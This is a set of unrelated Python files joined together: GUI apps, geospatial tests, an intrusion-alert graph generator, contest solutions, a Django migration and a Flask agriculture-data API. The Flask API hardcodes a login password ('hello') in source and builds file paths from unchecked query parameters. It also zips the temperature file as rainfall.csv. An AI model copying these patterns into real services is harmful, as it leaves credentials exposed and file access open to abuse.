self.parametre.rowconfigure(3, weight=1)
self.parametre.rowconfigure(4, weight=1)
self.nbrSeau = 5
self.tailles = [1, 2, 3, 4, 5]
self.final = 4
self.initial = [1, 1, 1, 1, 0]
button_retour = Button(text="Valider", command=self.check_button, width=10)
button_retour.grid(row=4, column=1)
Label(text="Nombre de seau :").grid(row=0, column=0)
Label(text="Tailles des seau (exemple pour 5 seau : 1;2;3;5;8) :").grid(row=1, column=0)
Label(text="But a atteindre :").grid(row=2, column=0)
Label(text="Remplissage initial (0 pour vide et 1 pour plein) :").grid(row=3, column=0)
self.entry_nbrS = StringVar()
Entry(textvariable=self.entry_nbrS, width=40).grid(row=0, column=1)
self.entry_nbrS.set("5")
self.entry_tailles = StringVar()
Entry(textvariable=self.entry_tailles, width=40).grid(row=1, column=1)
self.entry_tailles.set("1;2;3;5;8")
self.entry_final = StringVar()
Entry(textvariable=self.entry_final, width=40).grid(row=2, column=1)
self.entry_final.set("4")
self.entry_initial = StringVar()
Entry(textvariable=self.entry_initial, width=40).grid(row=3, column=1)
self.entry_initial.set("1;1;1;1;0")
return
def check_button(self):
self.nbrSeau = int(self.entry_nbrS.get())
tmp = self.entry_tailles.get().split(";")
self.tailles = []
for elt in tmp:
self.tailles.append(int(elt))
self.final = int(self.entry_final.get())
tmp = self.entry_initial.get().split(";")
self.initial = []
for elt in tmp:
self.initial.append(int(elt))
if self.check() :
self.parametre.destroy()
SeauWindow(self.nbrSeau, self.tailles, self.final, self.initial)
else :
self.pop = Tk()
self.pop.title('Erreur')
self.pop.geometry('350x350')
self.center(self.pop)
self.pop.columnconfigure(0, weight=1)
self.pop.rowconfigure(0, weight=1)
self.pop.rowconfigure(1, weight=2)
Label(self.pop, text="Pas de solution").grid(row=0, column=0)
Button(self.pop, text="exit", command=self.pop.destroy).grid(row=1, column=0)
# pop-up mauvais argument
return
def center(self, toplevel):
toplevel.update_idletasks()
# Tkinter way to find the screen resolution
screen_width = toplevel.winfo_screenwidth()
screen_height = toplevel.winfo_screenheight()
size = tuple(int(_) for _ in toplevel.geometry().split('+')[0].split('x'))
x = screen_width / 2 - size[0] / 2
y = screen_height / 2 - size[1] / 2
toplevel.geometry("+%d+%d" % (x, y))
return
def check(self):
list_gallon = []
for i in range(1, self.nbrSeau+1):
list_gallon.append(
class_gallons.Gallon(numero=i,
taille=self.tailles[i-1],
remplissage_inital=self.tailles[i-1]*self.initial[i-1])
)
model = class_gallons.Modelisation_Gallon(quantite_objectif=self.final, liste_gallons=list_gallon)
return model.solve()
#return True
|
import shapely
import pandas as pd
from shapely.geometry import Point, GeometryCollection
import pytest
from h3ronpy.pandas import change_resolution
from h3ronpy.pandas.vector import (
cells_to_points,
cells_to_polygons,
cells_dataframe_to_geodataframe,
geodataframe_to_cells,
geoseries_to_cells,
)
from h3ronpy import DEFAULT_CELL_COLUMN_NAME
import geopandas as gpd
from .. import load_africa
def test_cells_to_points():
gs = cells_to_points(
[
0x8009FFFFFFFFFFF,
]
)
assert isinstance(gs, gpd.GeoSeries)
assert gs.geom_type[0] == "Point"
def test_cells_to_polygons():
cells = change_resolution(
[
0x8009FFFFFFFFFFF,
],
3,
)
gs = cells_to_polygons(cells)
assert isinstance(gs, gpd.GeoSeries)
assert gs.geom_type[0] == "Polygon"
assert len(gs) == 286
linked_gs = cells_to_polygons(cells, link_cells=True)
assert isinstance(linked_gs, gpd.GeoSeries)
assert linked_gs.geom_type[0] == "Polygon"
assert len(linked_gs) == 1
assert shapely.get_num_coordinates(linked_gs[0]) > 120
def test_cells_dataframe_to_geodataframe():
df = pd.DataFrame(
{
DEFAULT_CELL_COLUMN_NAME: [
0x8009FFFFFFFFFFF,
],
"id": [
5,
],
}
)
gdf = cells_dataframe_to_geodataframe(df)
assert isinstance(gdf, gpd.GeoDataFrame)
assert len(gdf) == len(df)
assert (gdf[DEFAULT_CELL_COLUMN_NAME] == df[DEFAULT_CELL_COLUMN_NAME]).all()
assert (gdf["id"] == df["id"]).all()
assert gdf.geometry.geom_type[0] == "Polygon"
def test_cells_dataframe_to_geodataframe_empty():
# https://github.com/nmandery/h3ron/issues/17
df = pd.DataFrame({DEFAULT_CELL_COLUMN_NAME: []})
gdf = cells_dataframe_to_geodataframe(df) # should not raise an ValueError.
assert gdf.empty
def test_cells_geodataframe_to_cells():
africa = load_africa()
df = geodataframe_to_cells(africa, 4)
assert len(df) > len(africa)
assert df.dtypes[DEFAULT_CELL_COLUMN_NAME] == "uint64"
def test_geoseries_to_cells_flatten():
africa = load_africa()
cells = geoseries_to_cells(africa.geometry, 4, flatten=True)
assert len(cells) >= len(africa)
assert cells.dtype == "uint64"
def test_empty_geometrycollection_omitted():
gdf = gpd.GeoDataFrame(
{
"geometry": [
GeometryCollection(),
]
},
crs="epsg:4326",
)
df = geodataframe_to_cells(gdf, 4)
assert len(df) == 0
def test_fail_on_empty_point():
gdf = gpd.GeoDataFrame(
{
"geometry": [
Point(),
]
},
crs="epsg:4326",
)
with pytest.raises(ValueError):
geodataframe_to_cells(gdf, 4)
|
import string
import random
import sys
import time
import re
import pdb
def DrawIPFile(inputfile):
dipfile = {}
with open(inputfile) as res:
for line in res:
templine=line.decode('string_escape').strip("\"").strip()
line_split=line.split('\t')#line_split[0]=dip_sip,line_split[1]=the attack fr
dipsip=line_split[0].strip("\"")
div_dipsip=dipsip.split(",")#div_dipsip[0]=dip,div_dipsip[1]=sip
dip=div_dipsip[0].strip("\"")
if dipfile.get(dip) is not None:
dipfile.get(dip).append(templine)
else:
node_list = []
node_list.append(templine)
dipfile[dip] = node_list
file_list=[]
for (k,v) in dipfile.items():
file_list.append(k)
with open(k, 'wb') as file:
res = list(set(v))
att_content=[]
usedRandomList=[]
color_list=['olivedrab2','orange2','orangered2','orchid2','palegreen1','paleturquoise1','palevioletred1']
i=0
for alert in res:
temp_alert=alert.decode('string_escape').strip("\"").strip("[").strip("]").strip()
temp_div_alert=temp_alert.split("\t")#temp_div_alert[0]=dipsip,temp_div_alert[1]=the attack from sip to dip
div_alert=str(temp_div_alert[0])
dip_sip=div_alert.decode('string_escape').strip("\"").strip("[").strip("]").split(',')#dip_sip[0]=dip,
temp_sip=dip_sip[1].decode('string_escape').strip("\"").strip("\'").strip()
sip=temp_sip.decode('string_escape').strip("\"")
label_value="label="+"\""+sip+"\""+";"
random_color=color_list[(i%7)]
i=i+1
subgraph_color="color="+random_color+";"
random_char=string.join(random.sample(['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o'], 7)).replace(" ","")
random_num=random.randint(0,10000000)
subgraph_name="subgraph"+" "+"cluster"+random_char+str(random_num)
subgraph_style="style"+"="+"filled"+";"
subgraph_node="node [style=filled,shape=plaintext];"
attack=temp_div_alert[1].strip().strip("\"").split('->')
ranksame=[]
direction=[]
att_time=[]
label_list=[]
time_label=[]
time_name=[]
timelabeldict={}
finalranksame = []
for each_attack in attack:
div_each_attack=each_attack.split(',')
random_char1=string.join(random.sample(['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o'], 5)).replace(" ","")
random_num1=random.randint(0,1000)
while random_char1 in usedRandomList:
usedRandomList.append(random_char1)
random_char1 = string.join(random.sample(['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o'], 5)).replace(" ","")
while random_num1 in usedRandomList:
usedRandomList.append(random_num1)
random_num1 = random.randint(0,1000)
time_mark=time.time()
att_name='%s'%(div_each_attack[1])+str(time_mark)+random_char1+str(random_num1)
usedRandomList.append(random_char1)
usedRandomList.append(random_num1)
att_label="\""+att_name+"\""+"["+"label"+"="+"\""+each_attack[15:]+"\""+"]"
label_list.append(att_label)
att_time.append(div_each_attack[0])
att_direction="\""+att_name+"\""+"->"+"\""+k+"\""+"\n"
direction.append(att_direction)
one_rank="{rank=same;"+"\""+'%s'%(div_each_attack[0])+"\""+";"+"\""+att_name+"\""+";"+"}"+"\n"
ranksame.append(one_rank)
final_direction='\n'.join(direction)
rev_time=list(set(att_time))
sorted_time=sorted(rev_time)
for each_time in sorted_time:
random_char3=string.join(random.sample(['p','q','r','s','t','u','v','w','x','y','z'], 5)).replace(" ","")
random_num3=random.randint(1000,10000)
random_time_name=random_char3+str(random_num3)
one_time_label=random_time_name+"["+"label"+"="+"\""+each_time+"\""+"]"
timelabeldict[each_time] = random_time_name
time_label.append(one_time_label)
time_name.append(random_time_name)
temptimeorder="->".join(time_name) #different time is connected by ->
timeorder=temptimeorder+";\n"
for r in ranksame:
regex = r"\"\d{2}/\d{2}-\d{2}:\d{2}:\d{2}\""
rersult = re.search(regex, r).group(0)
striptime = rersult.strip("\"")
result,number = re.subn(regex, timelabeldict[striptime], r)
print r, result
finalranksame.append(result)
rank="".join(list(finalranksame))
label="\n".join(label_list)
all_time_label="\n".join(time_label)
one_att_content=subgraph_name+"{"+"\n"+subgraph_node+"\n"+subgraph_style+"\n"+subgraph_color+"\n"+timeorder+all_time_label+"\n"+label+"\n"+rank+final_direction+label_value+"\n"+"}"
att_content.append(one_att_content)
final_content="\n".join(att_content)
random_char2=string.join(random.sample(['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o'], 7)).replace(" ","")
random_num2=random.randint(0,1000)
dip_subgraph_name=random_char2+str(random_num2)
dip_subgraph_content="subgraph"+" "+"cluster"+dip_subgraph_name+"{"+"\n"+"node [color=red,shape=ellipse];"+"\n"+"\""+k+"\""+";"+"\n"+"}"
filestring = """digraph G {\n%s\n%s\n}""" % (dip_subgraph_content,final_content)
file.write(filestring)
return file_list |
from typing import List
from trainer_v2.keras_server.name_short_cuts import NLIPredictorSig
def get_em_base_nli() -> NLIPredictorSig:
def tokenize_normalize(chunk):
tokens = chunk.lower().split()
return tokens
def em_based_nli(t1: str, t2: str) -> List[float]:
tokens1 = tokenize_normalize(t1)
tokens2 = tokenize_normalize(t2)
entail = True
for t in tokens2:
if t in tokens1:
pass
else:
entail = False
if entail:
return [1, 0, 0]
else:
return [0, 1, 0]
def func(pair_items) -> List[List[float]]:
return [em_based_nli(t1, t2) for t1, t2 in pair_items]
return func
|
# BaekJoon18870.py
N = int(input())
arr = list(map(int, input().split()))
sorted_arr = sorted(list(set(arr)))
dic = {sorted_arr[i] : i for i in range(len(sorted_arr))}
for i in arr:
print(dic[i], end = " ") |
#!/usr/bin/env python3
"""
This file generates a single html page. When run multiple times, is can
generate all html files. When no input csv in defined, input is read from
stdin. When no output file is defined, output is written to stdout.
Usage:
soc_generator.py -o output_filename -t socs_topics_filename
-g socs_garants_filename template_dir -s state1,state2,...
-m path-to-root-template
"""
import soc_parser as parser
import os
import sys
import datetime
import logging
TEMPLATE_DIR = 'templates/soc'
TEMPLATE_TOPIC = 'topic.html'
TEMPLATE_INDEX = 'index.html'
TEMPLATE_NAVBAR = 'navbar.html'
TEMPLATE_GARANT = 'garant.html'
IMAGE_DIR = os.path.join('static', 'soc-icon')
class ArgOpts(object):
def __init__(self, topics=None, ofn=None, garants=None, states=None,
template=os.path.join(TEMPLATE_DIR, TEMPLATE_INDEX)):
self.topics = topics
self.ofn = ofn
self.garants = garants
if states is None:
states = []
self.states = states
self.template = template
def parse_args(argv):
"""Parses arguments"""
opts = ArgOpts(states=['volno', 'obsazeno']) # defaults
i = 0
while i < len(argv):
if argv[i] == '-t' and i < len(argv)-1:
opts.topics = argv[i+1].split(',')
i += 1
elif argv[i] == '-o' and i < len(argv)-1:
opts.ofn = argv[i+1]
i += 1
elif argv[i] == '-f' and i < len(argv)-1:
opts.field = argv[i+1]
i += 1
elif argv[i] == '-g' and i < len(argv)-1:
opts.garants = argv[i+1]
i += 1
elif argv[i] == '-s' and i < len(argv)-1:
opts.states = argv[i+1].split(',')
i += 1
elif argv[i] == '-m' and i < len(argv)-1:
opts.template = argv[i+1]
i += 1
i += 1
return opts
###############################################################################
def generate_soc(template, topic):
template = template.replace('{{state}}', 'soc-state-'+topic.state)
template = template.replace('{{id}}', topic.id)
name = topic.name
if topic.state == 'obsazeno':
name = name + ' (obsazeno)'
elif topic.state == 'ukončeno':
name = name + ' (ukončeno)'
template = template.replace('{{name}}', name)
template = template.replace('{{garant}}', topic.garant)
template = template.replace('{{head}}', topic.head)
template = template.replace('{{contact}}', topic.contact)
template = template.replace('{{annotation}}',
topic.annotation.replace('\n', '</p><p>'))
if '{{field-icons}}' in template:
icon_text = ''
for t in topic.fields:
svg_path = os.path.join(IMAGE_DIR, '%s.svg' % (t))
if os.path.isfile(svg_path):
icon_text += ('<div class="soc-field-image"><img src="/static/'
'soc-icon/%s.svg" alt="%s" title="%s"/></div>' %
(t, t, t))
else:
logging.warning('Missing file %s for SOC %s' %
(svg_path, topic.id))
template = template.replace('{{field-icons}}', icon_text)
return template
def generate_garant(g_template, s_template, garant, topics, index):
g_template = g_template.replace('{{name}}', garant.name)
g_template = g_template.replace('{{color}}',
'blue' if index % 2 == 0 else 'gray')
g_template = g_template.replace('{{intro}}', garant.intro)
if '{{topics}}' in g_template:
top_out = ''
for topic in topics:
top_out += generate_soc(s_template, topic)
g_template = g_template.replace('{{topics}}', top_out)
return g_template
def generate_garants(index_t, output, topic_t, garant_t, topics, garants):
topic_text = topic_t.read()
garant_text = garant_t.read()
for line in index_t:
line = line.replace('{{build_datetime}}',
datetime.datetime.now().strftime("%-d. %-m. %Y"))
if '{{garants}}' in line:
for i, garant in enumerate(garants):
filtered_topics = filter(
lambda x: x.garant == garant.name, topics
)
output.write(generate_garant(
garant_text, topic_text, garant, filtered_topics, i
) + '\n')
elif '{{about-color}}' in line:
output.write(line.replace(
'{{about-color}}',
'blue' if len(garants) % 2 == 0 else 'gray'
))
else:
output.write(line)
if __name__ == '__main__':
args = parse_args(sys.argv)
if args.garants is None:
sys.stderr.write('You must provide garants filename!\n')
sys.exit(1)
output = open(args.ofn, 'w', encoding='utf-8') if args.ofn else sys.stdout
topic_files = ([open(filename, 'r', encoding='utf-8') for filename in args.topics]
if args.topics else [sys.stdin])
garants = open(args.garants, 'r', encoding='utf-8')
template_dir = os.path.dirname(args.template)
path_index = args.template
path_topic = os.path.join(template_dir, TEMPLATE_TOPIC)
path_garant = os.path.join(template_dir, TEMPLATE_GARANT)
topics = []
for topic_file in topic_files:
topics += parser.parse_topic_csv(topic_file)
topics = list(filter(lambda topic: topic.state in args.states, topics))
topics.sort()
garants = parser.parse_garant_csv(garants)
with open(path_index, 'r', encoding='utf-8') as index,\
open(path_topic, 'r', encoding='utf-8') as topic,\
open(path_garant, 'r', encoding='utf-8') as garant:
generate_garants(index, output, topic, garant, topics, garants)
# ofn will be closed automatically here
|
# encoding: utf-8
import pytest
from mastermind_code import mastermind
def test_should_return_list():
response = mastermind(['red'], ['red'])
assert isinstance(response, list)
def test_should_return_list_with_2_components():
response = mastermind(['red'], ['red'])
assert len(response) > 0
def test_should_return_int_list_components():
response = mastermind(['red'], ['red'])
assert isinstance(response[0], int)
assert isinstance(response[1], int)
def test_should_return_well_placed_for_minimum_case():
response = mastermind(['red'], ['red'])
assert response[0] == 1
assert response[1] == 0
def test_should_return_incorrect_for_minimum_case():
response = mastermind(['red'], ['blue'])
assert response[0] == 0
assert response[1] == 0
def test_should_return_miss_placed_for_minimum_case():
response = mastermind(['red', 'blue'], ['blue', 'yellow'])
assert response[0] == 0
assert response[1] == 1
def test_should_raise_value_error_if_different_len():
with pytest.raises(ValueError):
mastermind(['red', 'blue'], ['yellow'])
|
#'''
def amount_people(PP) :
result = 0
cResult = 0
PPR = PP[::-1]
PPR = list(map(int,PPR))
#printDebug("PPR : ",PPR)
M2 = len(PP) - 1
#printDebug("M2 : ",M2)
for i in range (len(PP)-1) :
#PPR[i]
#printDebug("len of less lev",len(PPR[i+1::]))
lev = len(PPR[i+1::])
SPPI = sum(PPR[i+1::])
carry = SPPI-lev
#if i > 0 :
if carry > 0 and i == 0:
#no need
carry = 0
elif carry <= 0 and i == 0:
result = abs(carry)
if i > 0 and carry < 0 and abs(carry) > result :
result = abs(carry)
return result
def formatValue(Ns) :
Nchar = list(map(int,list(Ns[0])))
#Nchar = map(chr,list(Ns[0]))
intNchar = list(map(int,Nchar))
N = int(Ns[0])
return Nchar, N#, intNchar
Padd = 0
countLine=0
countCase = 1
result = 0
#example.in
#D-small-practice.in
#'A-EX.in'
#'A-small-attempt0.in'
with open('A-large.in','r') as ifile, open('outputJam2016-A-large.out','w') as ofile, open('debug.out','w') as oDfile, open('dataRcheck.out','w') as oRfile:
for line in ifile :
#print (line)
print("6666666666666666666666666666666666666666666666666")
if countLine == 0 :
case = line.split()
case = int(case[0])
print ("case : ",case)
#case = int(line.split())
elif countLine >= 1 and countCase >= 0 and countCase <= case :
Ns = line.split()
#Nchar = map(int,list(Ns[0]))
#Nchar=line.strip()
#wList[:0] = w
#intNchar = map(int,Nchar)
#N = int(Ns[0])
Nchar, N = formatValue(Ns)
#,' intNchar : ',intNchar
print(" Ns : ",Ns," N : ",N,' Nchar : ',Nchar)
#,' ns[3][1] : ',Ns[2][1]
if N == 0 :
result = 'INSOMNIA'
else :
#print(len(set(Nchar)))
NcharAll = Nchar[:]
'''
print("NcharAll : ",NcharAll,len(set(NcharAll)))
#NcharAll.extend(['2','3'])
#print("NcharAll : ",NcharAll)
N=N*2
print("N : ",N)
N = str(N)
print("N : ",N)
Ns = N.split()
print("Ns : ",Ns)
Nchar, N = formatValue(Ns)
print("Nchar : ",Nchar)
NcharAll.extend(Nchar)
print("NcharAll : ",NcharAll)
'''
i=2
while len(set(NcharAll))<10 :
#print("set(NcharAll) : ",set(NcharAll))
newN=N*i
i=i+1
#print("newN : ",newN)
newN = str(newN)
#print("N : ",N)
Ns = newN.split()
#print("Ns : ",Ns)
Nchar, newN = formatValue(Ns)
print("newN : ",newN)
#print("Nchar : ",Nchar)
NcharAll.extend(Nchar)
#print("NcharAll : ",NcharAll)
print("set(NcharAll) : ",set(NcharAll))
#print("solution : ",newN)
#print("test")
result = newN
#if
'''
[M, PP] = map(str, line.split())
M = int(M)
PP = str(PP)
PP = iter(PP)
PP = ' '.join(PP)
PP = PP.split()
result = amount_people(PP)
'''
outLine = 'Case #'+str(countCase)+': '+str(result)+'\n'
print(outLine)
ofile.write(outLine)
countCase = countCase + 1
else :
printDebug("IMPORSIBLE ??!!",99)
if countCase > case :
#print("break")
break
countLine = countLine + 1
ifile.close()
ofile.close()
oDfile.close()
oRfile.close()
|
# -*- coding: utf-8 -*-
"""
Created on Sat Jun 1 15:38:43 2019
@author: 10670
"""
import sys; sys.path
from tkinter import*
import GUI_CeShi
def main():
root = Tk()
root.title("手写数字识别系统")
#生成标签
main_label = Label(root, text = "欢迎来到手写数字识别系统")
main_label.grid(row = 0, column = 0, padx = 30, pady = 5)
#生成提示信息标签
choose_label = Label(root, text = "点击开始按钮进入系统")
choose_label.grid(row = 1, column = 0, padx = 30, pady = 5)
#生成开始按钮
add_button = Button(root, text = "开始", bg = "light blue", command = GUI_CeShi.main)
add_button.grid(row = 2, column = 0, padx = 30, pady = 5)
root.mainloop()
def shibie():
pass
if __name__ == '__main__':
main() |
# Generated by Django 3.1.4 on 2021-01-04 07:17
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('mainapp', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='product',
name='image',
),
migrations.CreateModel(
name='Gallery',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('is_main', models.BooleanField(default=False)),
('image', models.ImageField(blank=True, upload_to='product_images')),
('product', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='gallery', to='mainapp.product')),
],
),
]
|
from __future__ import annotations
import json
from datetime import datetime
from typing import TypeVar, Generic, Callable, Any
import util
MessageContent = TypeVar("MessageContent")
class _Keys:
SENDER: str = "sender"
CONTENT: str = "content"
TOPIC: str = "topic"
DATE: str = "date"
class Message(Generic[MessageContent]):
def __init__(self, sender: str, topic: str, content: MessageContent, date: datetime):
self.sender = sender
self.topic = topic
self.content = content
self.date = date
def encode(self) -> str:
""" Creates a JSON representation of the message.
The JSON representation contains the message's sender, content, topic and UNIX timestamp.
Returns:
The JSON representation of the message.
"""
return json.dumps({
_Keys.SENDER: self.sender,
_Keys.CONTENT: self.content,
_Keys.TOPIC: self.topic,
_Keys.DATE: self.date.timestamp()
})
@staticmethod
def decode(json_message: str) -> Message[MessageContent]:
""" Creates a message from a given json representation of that message.
The JSON representation must contain the message's sender, topic, content and UNIX timestamp.
Args:
json_message: JSON representation of the message.
Returns:
The message represented by the JSON string.
Raises:
AssertionError: If the message does not contain the required message information.
"""
# decode json data
data = json.loads(json_message)
# data must contain the message's sender, topic, content and date
util.assert_keys_exist([_Keys.SENDER, _Keys.TOPIC, _Keys.CONTENT, _Keys.DATE], data)
return Message(
data[_Keys.SENDER],
data[_Keys.TOPIC],
data[_Keys.CONTENT],
datetime.fromtimestamp(data[_Keys.DATE])
)
def __repr__(self):
return f"Message[#{self.sender}: {self.topic}: {self.date}: {self.content}]"
Callback = Callable[[Message], Any]
|
import os
from datetime import datetime
from zipfile import ZipFile, ZIP_DEFLATED
import pandas as pd
from flask import Flask, jsonify, send_from_directory, request, send_file
from flask_cors import CORS
from flask_httpauth import HTTPBasicAuth
from werkzeug.security import generate_password_hash, check_password_hash
from statistics_data_fetcher import fetch_rainfall_whole_data, fetch_temp_whole_data, fetch_humidity_whole_data
from weather_filters import multiple_states, single_loc, multiple_dists
from yield_filters import multiple_states_yield, single_loc_yield, multiple_dists_yield
app = Flask(__name__)
auth = HTTPBasicAuth()
CORS(app)
_keyNameTemperature = 'temperature'
_keyNameHumidity = 'humidity'
_keyNameRainfall = 'rainfall'
_keyNameDists = 'dists'
_keyNameDistrict = 'district'
_keyNameState = 'state'
_keyNameStates = 'states'
_keyNameId = 'id'
_keyNameStateId = 'state_id'
_keyNameSeasons = 'seasons'
_keyNameCrops = 'crops'
_keyNameYield = 'yield'
_keyNameName = 'name'
_keyNameCropId = 'crop_id'
_queryParamState = 'state'
_queryParamDist = 'dist'
_queryParamStates = 'states'
_queryParamDists = 'dists'
_queryParamYears = 'years'
_queryParamParams = 'params'
_queryParamStateId = 'state_id'
_queryParamDistId = 'dist_id'
_queryParamSeason = 'season'
_queryParamCrop = 'crop'
users = {
"sughosh": generate_password_hash("hello")
}
@auth.verify_password
def verify_password(username, password):
if username in users and check_password_hash(users.get(username), password):
print('Authenticated')
return username
@app.route('/')
def home():
print(f'/home endpoint called ')
return 'Agri Guide'
@app.route('/weather')
def weather():
state = request.args.get(_queryParamState)
dist = request.args.get(_queryParamDist)
state = state.replace(' ', '+')
dist = dist.replace(' ', '+')
print(f'/weather endpoint called with state={state} and dist={dist}')
if state is None or dist is None:
return jsonify({'message': 'The requested location cannot be processed'}), 404
if state == 'Test' and dist == 'Test':
return jsonify({_keyNameTemperature: [1, ],
_keyNameHumidity: [2, ],
_keyNameRainfall: [3, ]})
files1 = os.listdir('outputs/temp')
files2 = os.listdir('outputs/humidity')
files3 = os.listdir('outputs/rainfall')
file = dist + ',' + state + '.csv'
try:
if file not in files1:
# temperature_caller(state, dist)
return jsonify({'message': 'The requested location cannot be processed'}), 404
if file not in files2:
# humidity_caller(state, dist)
return jsonify({'message': 'The requested location cannot be processed'}), 404
if file not in files3:
# rain_caller(state, dist)
return jsonify({'message': 'The requested location cannot be processed'}), 404
print(f'All weather prediction complete for state={state} and dist={dist}')
df1 = pd.read_csv(f'outputs/temp/{file}')
df2 = pd.read_csv(f'outputs/humidity/{file}')
df3 = pd.read_csv(f'outputs/rainfall/{file}')
my_values = {
_keyNameTemperature: df1['Predicted'].to_list(),
_keyNameHumidity: df2['Predicted'].to_list(),
_keyNameRainfall: df3['Predicted'].round(2).to_list()
}
return jsonify(my_values), 200
except FileNotFoundError:
return jsonify({'message': 'The requested location cannot be processed'}), 404
def create_file_name():
present_time = datetime.now()
_day = present_time.day
_month = present_time.month
_year = present_time.year
_minute = present_time.minute
_hour = present_time.hour
_filename = str(_year) + str(_month) + str(_day) + str(_hour) + str(_minute) + '.zip'
return _filename
def clear_file_contents(param):
if param == 'yield':
file = open(f'filter_outputs/yield/{param}.csv', 'w+')
file.close()
else:
file = open(f'filter_outputs/weather/{param}.csv', 'w+')
file.close()
@app.route('/agri_guide/downloads')
def download_with_filters():
"""
states: List of states\n
dists: Will be used only when len(states) == 1\n
years: If years == 0 then all years else will accept length of 2\n
params: temp,humidity,rainfall,yield\n
:return: ZIP file containing the required CSV files
"""
states = request.args.getlist(_queryParamStates)
dists = request.args.getlist(_queryParamDists)
years = request.args.getlist(_queryParamYears)
params = request.args.getlist(_queryParamParams)
try:
if len(states) == 1:
states = states[0].split(',')
states = [state.replace(' ', '+') for state in states]
if len(dists) == 1:
dists = dists[0].split(',')
dists = [dist.replace(' ', '+') for dist in dists]
if len(years) == 1:
years = years[0].split(',')
years = [int(i) for i in years]
if len(params) == 1:
params = params[0].split(',')
print(f'/agri_guide/downloads endpoint called with states={states}, '
f'dists={dists}, years={years} and params={params}')
clear_file_contents('temp')
clear_file_contents('humidity')
clear_file_contents('rain')
clear_file_contents('yield')
if len(states) > 1:
multiple_states(states, years, params)
if len(states) == 1 and len(dists) > 1:
multiple_dists(states[0], dists, years, params)
if len(states) == 1 and len(dists) == 1:
if dists == ['0']:
multiple_dists(states[0], dists, years, params)
else:
single_loc(states[0], dists[0], years, params)
try:
if 'yield' in params:
if len(states) > 1:
multiple_states_yield(states)
if len(states) == 1 and len(dists) > 1:
multiple_dists_yield(states[0], dists)
if len(states) == 1 and len(dists) == 1:
if dists == ['0']:
multiple_dists_yield(states[0], dists)
else:
single_loc_yield(states[0], dists[0])
except:
print(f'yield data not found for states={states} and dists={dists}')
handle = ZipFile('required_downloads.zip', 'w')
if 'temp' in params:
handle.write('filter_outputs/weather/temp.csv', 'temperature.csv', compress_type=ZIP_DEFLATED)
if 'humidity' in params:
handle.write('filter_outputs/weather/humidity.csv', 'humidity.csv', compress_type=ZIP_DEFLATED)
if 'rainfall' in params:
handle.write('filter_outputs/weather/rain.csv', 'rainfall.csv', compress_type=ZIP_DEFLATED)
if 'yield' in params:
handle.write('filter_outputs/yield/yield.csv', 'yield.csv', compress_type=ZIP_DEFLATED)
handle.close()
print(f'ZipFile created for states={states}, '
f'dists={dists}, years={years} and params={params}')
response = send_file('required_downloads.zip', as_attachment=True, attachment_filename=create_file_name())
return response, 200
except:
return jsonify({'message': 'The requested location cannot be processed'}), 404
@app.route('/weather/downloads')
def download_weather_filters():
"""
states: List of states\n
dists: Will be used only when len(states) == 1\n
years: If years == 0 then all years else will accept length of 2\n
params: temp,humidity,rainfall\n
:return: ZIP file containing the required CSV files
"""
states = request.args.getlist(_queryParamStates)
dists = request.args.getlist(_queryParamDists)
years = request.args.getlist(_queryParamYears)
params = request.args.getlist(_queryParamParams)
try:
if len(states) == 1:
states = states[0].split(',')
states = [state.replace(' ', '+') for state in states]
if len(dists) == 1:
dists = dists[0].split(',')
dists = [dist.replace(' ', '+') for dist in dists]
if len(years) == 1:
years = years[0].split(',')
years = [int(i) for i in years]
if len(params) == 1:
params = params[0].split(',')
print(f'/weather/downloads endpoint called with states={states}, '
f'dists={dists}, years={years} and params={params}')
if len(states) > 1:
multiple_states(states, years, params)
if len(states) == 1 and len(dists) > 1:
multiple_dists(states[0], dists, years, params)
if len(states) == 1 and len(dists) == 1:
if dists == ['0']:
multiple_dists(states[0], dists, years, params)
else:
single_loc(states[0], dists[0], years, params)
handle = ZipFile('required_downloads.zip', 'w')
if 'temp' in params:
handle.write('filter_outputs/weather/temp.csv', 'temperature.csv', compress_type=ZIP_DEFLATED)
if 'humidity' in params:
handle.write('filter_outputs/weather/humidity.csv', 'humidity.csv', compress_type=ZIP_DEFLATED)
if 'rainfall' in params:
handle.write('filter_outputs/weather/rain.csv', 'rainfall.csv', compress_type=ZIP_DEFLATED)
handle.close()
print(f'ZipFile created for states={states}, '
f'dists={dists}, years={years} and params={params}')
response = send_file('required_downloads.zip', as_attachment=True, attachment_filename=create_file_name())
return response, 200
except:
return jsonify({'message': 'The requested location cannot be processed'}), 404
@app.route('/weather/files')
@auth.login_required
def download_weather_predicted_files():
state = request.args.get(_queryParamState)
dist = request.args.get(_queryParamDist)
state = state.replace(' ', '+')
dist = dist.replace(' ', '+')
print(f'/weather/files endpoint called with state={state} and '
f'dist={dist}')
if state is None or dist is None:
return jsonify({'message': 'The requested location cannot be processed'}), 404
files3 = os.listdir('outputs/rainfall')
file = dist + ',' + state + '.csv'
if file in files3:
handle = ZipFile(f'{dist},{state}.zip', 'w')
handle.write(f'outputs/temp/{file}', 'temperature.csv', compress_type=ZIP_DEFLATED)
handle.write(f'outputs/humidity/{file}', 'humidity.csv', compress_type=ZIP_DEFLATED)
handle.write(f'outputs/temp/{file}', 'rainfall.csv', compress_type=ZIP_DEFLATED)
handle.close()
print(f'ZipFile created for state={state} and '
f'dist={dist}')
return send_from_directory('', f'{dist},{state}.zip', as_attachment=True)
else:
return jsonify({'message': 'File not found'}), 404
def preprocessing(s):
s = s.replace('+', ' ')
s = s.title()
return s
@app.route('/get_states')
def get_state():
isTest = request.args.get('isTest')
print(f'/get_states endpoint called')
base_url = 'https://raw.githubusercontent.com/bssughosh/agri-guide-data/master/datasets/weather/'
file = 'places.csv'
df = pd.read_csv(base_url + file)
df['State'] = df['State'].apply(lambda c: preprocessing(c))
res = {}
res1 = []
states = list(df['State'].unique())
for i, j in enumerate(states):
t = {_keyNameId: str(i + 1), _keyNameName: j}
res1.append(t)
if isTest == 'true':
return jsonify({_keyNameState: [{_keyNameId: 'Test', _keyNameName: 'Test'}, ]})
res[_keyNameState] = res1
return jsonify(res), 200
@app.route('/get_state_value')
def get_state_for_state_id():
state_id = request.args.getlist(_queryParamStateId)
